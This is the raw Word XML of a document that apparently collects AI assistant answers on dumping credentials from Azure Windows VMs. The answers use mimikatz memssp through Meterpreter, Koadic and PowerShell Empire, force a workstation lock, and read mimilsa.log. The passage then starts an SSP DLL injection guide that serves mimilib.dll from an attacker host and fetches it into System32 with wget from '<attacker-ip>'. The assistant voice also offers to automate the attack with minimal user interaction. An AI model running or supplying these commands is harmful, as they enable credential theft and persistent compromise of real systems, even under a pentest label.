      </w:r>
    </w:p>
    <w:p w14:paraId="22D8F9CB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Lock the workstation remotely:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3ADEB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meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37641405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C:\&gt; rundll32.exe user32.dll,LockWorkStation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560E334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Wait for user login to create the log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8FE22" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Read the credential log file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A39B1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meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3FEE2" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>C:\&gt; type C:\Windows\System32\mimilsa.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41161E29" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="37B3FE96">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="088FE0B1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3. Using Koadic (Zombie RAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB98F5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Get an interactive Koadic session on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C179A63" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use the mimikatz payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AA853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lastRenderedPageBreak/>
        <w:t>use mimikatz_dynwrapx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32684242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t>set MIMICMD misc::memssp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2AA1A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t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B049644" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Force workstation lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A057AFC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t>cmdshell 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BC593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t>C:\&gt; rundll32.exe user32.dll,LockWorkStation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E782CC" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Read the credential log file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491C99D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>type C:\Windows\System32\mimilsa.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F06F77" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="0F3A891A">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1037E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4. Using PowerShell Empire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521FDBC1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Get a session in PowerShell Empire on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E5301" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Run the memssp persistence module to inject mimikatz in memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110329AE" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>usemodule persistence/misc/memssp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162A34C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F5F19" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Lock the victim workstation to trigger logon:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FF64E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>usemodule management/lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8FF55" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C981E72" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>After user logon, retrieve credentials by reading the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D4C898" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>type C:\Windows\System32\mimilsa.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08202625" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="53AA5E4B">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54641263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Additional Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E223B9B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>The misc::memssp module hooks into the Windows Security Support Provider to capture credentials as users log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22556268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>This technique relies on a forced logout/login cycle; you must either lock the session or cause a reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACF2FE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>On Azure VMs, the session might be locked via remote command execution or through RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2D17D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>Extracted credentials can include clear-text passwords, NTLM hashes, Kerberos tickets, and other sensitive tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B92BD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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux Azure VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>, credential dumping requires different tools (e.g., mimikatz is Windows-only); focus on SSH keys, sudo rights, or environment variables instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47190678" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Dumped credentials from local and AD accounts can potentially escalate to Microsoft Entra ID if password hash syncing or password writeback features are configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A1112" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="49F057C2">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DB375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Summary Table of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371"/>
        <w:gridCol w:w="2788"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="3B1C37BD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A7A21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1C09AC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6ABE279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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="2924486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2A32" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CC6A684" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>privilege::debug misc::memssp type C:\Windows\System32\mimilsa.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BEEF470" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Manual run on target Windows VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="316CFBF4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577B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FAEF22" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>load kiwi kiwi_cmd misc::memssp rundll32.exe user32.dll,LockWorkStation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B4E975" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Requires Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="3FCBD574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A04C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Koadic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BB46996" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>use mimikatz_dynwrapx set MIMICMD misc::memssp execute rundll32.exe ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33438180" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Requires Koadic session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="403E318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A7B3" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerShell Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71D6285C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>usemodule persistence/misc/memssp execute usemodule management/lock execute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FD74350" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerShell-based post-exploitation tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CFDC262" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="246398A0">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16FD00" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>If you want, I can also prepare commands/scripts to automate this with minimal user interaction or cover Linux credential-related pentesting for Azure. Would you like that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4A2D8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563"/>
    <w:p w14:paraId="2E181B00" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563"/>
    <w:p w14:paraId="6DD0A371" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Certainly! Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, concise, and detailed summary</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> of how to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Dumping via Security Support Provider (SSP) DLL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> using PowerShell Empire's mimilib.dll on Azure Windows VMs, including all steps, commands, and relevant Azure VM details. I removed duplicates and clarified every minute detail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B1B16" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="1BE3023A">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EB10B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Azure Windows VM Credential Dumping Pentest via Security Support Provider (SSP) Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EECB10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Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FC84F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Local Windows accounts on Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C46115" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>AD domain accounts on domain-joined Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD290F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Microsoft Entra ID accounts indirectly (via synced local/AD credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD1AC4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="6ED92536">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE87D7D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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22E54C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">This method uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>malicious SSP DLL (mimilib.dll) injection</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> technique, remotely deploying a DLL that hooks into Windows authentication to dump credentials persistently across reboots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC379FD" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistent credential dumping technique</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BAF9C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote command execution</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> or session on target Azure Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FCBF34" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Exploits </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>registry manipulation vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> to load attacker-controlled SSP DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FE4F6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system restart</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> for payload activation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F9E9C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Results in credentials being dumped to a log file (kiwissp.log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4C06E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="1B758706">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34471C3F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Detailed Steps &amp; Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27136006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1. Setup the DLL hosting server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D57966E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>On your attacker machine (e.g., Kali Linux or any machine hosting mimilib.dll):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1432C20C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Navigate to the directory containing mimilib.dll (from Mimikatz binaries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AEFCB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cd /path/to/mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE29BF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Start a simple Python HTTP server to serve the DLL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4468D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python -m SimpleHTTPServer 8000  # For Python 2.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643519D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# OR for Python 3.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9EA4F6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B62A8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="06C9B525">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74B972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2. Download mimilib.dll to the Azure Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB3243" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>From your remote session (e.g., PowerShell Empire agent session or any remote shell on the Azure VM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC42B41" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>shell wget http://&lt;attacker-ip&gt;:8000/mimilib.dll -outfile C:\Windows\System32\mimilib.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC1A47" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59490270" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Downloads the malicious DLL from your server to the target’s System32 folder.</w:t>
      </w:r>
    </w:p>
